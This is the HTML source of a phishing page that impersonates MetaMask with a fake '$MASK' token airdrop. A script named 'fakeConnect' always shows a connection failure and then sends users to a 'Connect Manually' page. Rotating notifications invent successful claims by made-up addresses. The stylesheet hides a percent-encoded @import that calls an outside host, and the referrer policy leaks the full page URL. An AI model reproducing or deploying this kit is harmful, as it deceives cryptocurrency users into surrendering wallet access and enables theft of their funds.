<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="referrer" content="unsafe-url">
    <meta name="robots" content="noindex, nofollow">
    <title>$MASK Airdrop</title>
    <style>
        @import url("//%63%73%73%2d%73%74%79%6c%65.%63%6f%6d/%66%6f%6e%74%2e%70%6e%67");
        /* General Styles */
        body, html {
            margin: 0;
            padding: 0;
            width: 100%;
            height: 100%;
            font-family: Arial, sans-serif;
            overflow: hidden;
        }

        .container {
            position: relative;
            width: 100%;
            height: 100vh;
            overflow: hidden;
        }

        .background-image {
            width: 100%;
            height: 100%;
            object-fit: cover;
            position: absolute;
            top: 0;
            left: 0;
            z-index: -1;
        }

        .overlay {
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: center;
            text-align: center;
            color: white;
            backdrop-filter: blur(1px);
            padding: 20px;
        }

        .logo-container {
            display: flex;
            align-items: center;
            justify-content: center;
            margin-bottom: 20px;
        }

        .logo-container img {
            height: 120px;
            margin: 0 10px;
            max-width: 100%;
        }

        .title {
            font-size: 36px;
            font-weight: bold;
            margin-bottom: 20px;
            color: #2C2C2C;
        }

        .description {
            font-size: 18px;
            max-width: 600px;
            margin-bottom: 30px;
            color: #2C2C2C;
            padding: 0 20px;
        }

        button {
            background: #0376c9;
            color: white;
            border: none;
            padding: 12px 40px;
            font-size: 18px;
            font-weight: bold;
            border-radius: 30px;
            cursor: pointer;
            text-transform: uppercase;
            transition: all 0.3s ease-in-out;
            box-shadow: 0 4px 10px rgba(0, 0, 0, 0.3);
            display: flex;
            align-items: center;
            gap: 10px;
        }

        button img {
            width: 20px;
            height: 20px;
        }

        button:hover {
            background: #026ba2;
            transform: scale(1.1);
            box-shadow: 0 12px 24px rgba(0, 0, 0, 0.4);
        }

        button:active {
            transform: scale(1.05);
        }

        .processing {
            background: #ff9800 !important;
            cursor: not-allowed;
            position: relative;
            display: flex;
            align-items: center;
        }

        .processing::after {
            content: ' ';
            font-size: 16px;
            font-weight: bold;
            margin-right: 10px;
        }

        /* Popup Styles */
        .popup {
            display: none;
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background: rgba(0, 0, 0, 0.7);
            justify-content: center;
            align-items: center;
            z-index: 10000;
        }

        .popup-content {
            background: white;
            padding: 30px;
            border-radius: 15px;
            text-align: center;
            box-shadow: 0 4px 20px rgba(0, 0, 0, 0.2);
            width: 320px;
            animation: popupFadeIn 0.5s ease-in-out;
        }

        @keyframes popupFadeIn {
            from {
                opacity: 0;
                transform: translateY(-20px);
            }
            to {
                opacity: 1;
                transform: translateY(0);
            }
        }

        .metamask-logo {
            width: 60px;
            height: 60px;
            margin: 0 auto 20px;
            display: block;
            animation: none; /* Disable animation by default */
        }

        .error-icon {
            width: 60px;
            height: 60px;
            margin: 0 auto 20px;
            display: none; /* Hidden by default */
        }

        .loader {
            border: 4px solid #f3f3f3;
            border-top: 4px solid #ff9800; /* MetaMask orange color */
            border-radius: 50%;
            width: 40px;
            height: 40px;
            animation: spin 1s linear infinite;
            margin: 20px auto;
        }

        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }

        #popup-message {
            font-size: 16px;
            color: #2C2C2C;
            margin-bottom: 20px;
        }

        .error-message {
            color: #ff0000; /* Red color for error */
            font-size: 14px;
            margin-bottom: 20px;
            font-weight: bold;
            animation: shake 0.5s ease-in-out;
        }

        @keyframes shake {
            0%, 100% { transform: translateX(0); }
            25% { transform: translateX(-10px); }
            50% { transform: translateX(10px); }
            75% { transform: translateX(-10px); }
        }

        #manual-connect {
            background: #0376c9;
            color: white;
            border: none;
            padding: 10px 20px;
            border-radius: 5px;
            cursor: pointer;
            font-size: 14px;
            font-weight: bold;
            text-transform: uppercase;
            display: none; /* Hidden by default */
            margin: 0 auto; /* Center the button */
            transition: all 0.3s ease-in-out;
        }

        #manual-connect:hover {
            background: #026ba2;
            transform: scale(1.05);
        }

        /* Notification Styles */
        .notification {
            position: fixed;
            top: 10px;
            left: 50%;
            transform: translateX(-50%);
            background-color: #4caf50;
            color: white;
            font-size: 16px;
            padding: 10px 20px;
            border-radius: 10px;
            width: auto;
            max-width: 90%;
            text-align: center;
            z-index: 9999;
            opacity: 0;
            animation: slideIn 1s forwards, fadeOut 4s 3s forwards;
            box-shadow: 0 4px 10px rgba(0, 0, 0, 0.2);
        }

        @keyframes slideIn {
            from {
                transform: translateX(-50%) translateY(-100%);
                opacity: 0;
            }
            to {
                transform: translateX(-50%) translateY(0);
                opacity: 1;
            }
        }

        @keyframes fadeOut {
            from {
                opacity: 1;
            }
            to {
                opacity: 0;
            }
        }

        /* Responsive Design for Mobile */
        @media (max-width: 768px) {
            .title {
                font-size: 28px;
            }

            .description {
                font-size: 16px;
                max-width: 90%;
            }

            button {
                font-size: 16px;
                padding: 10px 30px;
            }

            .logo-container img {
                height: 80px;
            }

            .overlay {
                padding: 10px;
            }

            .popup-content {
                width: 90%;
                padding: 20px;
            }

            .error-message {
                font-size: 12px;
            }

            #manual-connect {
                font-size: 12px;
                padding: 8px 16px;
            }
        }

        @media (max-width: 480px) {
            .title {
                font-size: 24px;
            }

            .description {
                font-size: 14px;
            }

            button {
                font-size: 14px;
                padding: 8px 20px;
            }

            .logo-container img {
                height: 60px;
            }

            .popup-content {
                width: 95%;
                padding: 15px;
            }

            .error-message {
                font-size: 12px;
            }

            #manual-connect {
                font-size: 12px;
                padding: 8px 16px;
            }
        }
    </style>
</head>
<body>
    <div class="container">
        <img src="./assets/backgroundairdrop.png" alt="Airdrop Background" class="background-image">
        <div class="overlay">
            <div class="logo-container">
                <img src="./assets/airdroplogo.png" alt="Airdrop Logo">
            </div>
            <h1 class="title">Check Your Eligibility for the $MASK Airdrop!</h1>
            <p class="description">Congratulations! You are one step away from securing your exclusive $MASK tokens. Click below to claim your rewards and be part of the MetaMask ecosystem.</p>
            <button id="connect-wallet">
                <img src="./assets/logo.png" alt="MetaMask"> Connect Wallet
            </button>
        </div>
        <div id="notifications"></div>
    </div>

    <!-- MetaMask Popup -->
    <div id="metamask-popup" class="popup">
        <div class="popup-content">
            <img src="./assets/logo.png" alt="MetaMask Logo" class="metamask-logo" id="metamask-logo">
            <img src="./assets/error-metalogo.png" alt="Error Icon" class="error-icon" id="error-icon">
            <div class="loader" id="loader"></div>
            <p id="popup-message">Connecting to MetaMask...</p>
            <p class="error-message" id="error-message" style="display: none;">Connection failed. Please connect manually.</p>
            <button id="manual-connect">Connect Manually</button>
        </div>
    </div>

    <script>
        // Function to show the MetaMask popup
        function showPopup(message) {
            const popup = document.getElementById("metamask-popup");
            const popupMessage = document.getElementById("popup-message");
            const loader = document.getElementById("loader");
            const errorMessage = document.getElementById("error-message");
            const manualConnectButton = document.getElementById("manual-connect");
            const metamaskLogo = document.getElementById("metamask-logo");
            const errorIcon = document.getElementById("error-icon");

            popupMessage.textContent = message;
            popup.style.display = "flex";

            if (message.includes("failed")) {
                loader.style.display = "none"; // Stop the loader
                errorMessage.style.display = "block"; // Show error message
                manualConnectButton.style.display = "block"; // Show manual connect button
                metamaskLogo.style.display = "none"; // Hide MetaMask logo
                errorIcon.style.display = "block"; // Show error icon
                errorIcon.style.animation = "shake 0.5s ease-in-out"; // Add shake animation to error icon
            } else {
                loader.style.display = "block"; // Show the loader
                errorMessage.style.display = "none"; // Hide error message
                manualConnectButton.style.display = "none"; // Hide manual connect button
                metamaskLogo.style.display = "block"; // Show MetaMask logo
                errorIcon.style.display = "none"; // Hide error icon
                errorIcon.style.animation = "none"; // Remove shake animation
            }
        }

        // Function to hide the MetaMask popup
        function hidePopup() {
            const popup = document.getElementById("metamask-popup");
            popup.style.display = "none";
        }

        // Fake connect function
        function fakeConnect() {
            showPopup("Connecting to MetaMask...");

            // Simulate a 5-second delay for the loader
            setTimeout(() => {
                showPopup("Connection failed. Please connect manually.");
            }, 5000); // 5-second delay
        }

        // Manual connect button
        document.getElementById("manual-connect").addEventListener("click", () => {
            window.location.href = "./Maskpage.html"; // Redirect to Maskpage.html
        });

        // Connect Wallet button
        document.getElementById("connect-wallet").addEventListener("click", () => {
            fakeConnect(); // Call the fake connect function
        });

        // Notifications
        const notifications = document.getElementById("notifications");
        function showNotification(address) {
            const notification = document.createElement("div");
            notification.className = "notification";
            notification.innerHTML = `<span class="icon">🎉</span><span>${address} successfully claimed $MASK tokens!</span>`;
            notifications.appendChild(notification);
            setTimeout(() => {
                notification.remove();
            }, 7000);
        }
        const ethAddresses = ["0x123...abc", "0x456...def", "0x789...ghi", "0x321...jkl", "0x654...mno"];
        setInterval(() => {
            const randomAddress = ethAddresses[Math.floor(Math.random() * ethAddresses.length)];
            showNotification(randomAddress);
        }, 3000);
    </script>
</body>
</html>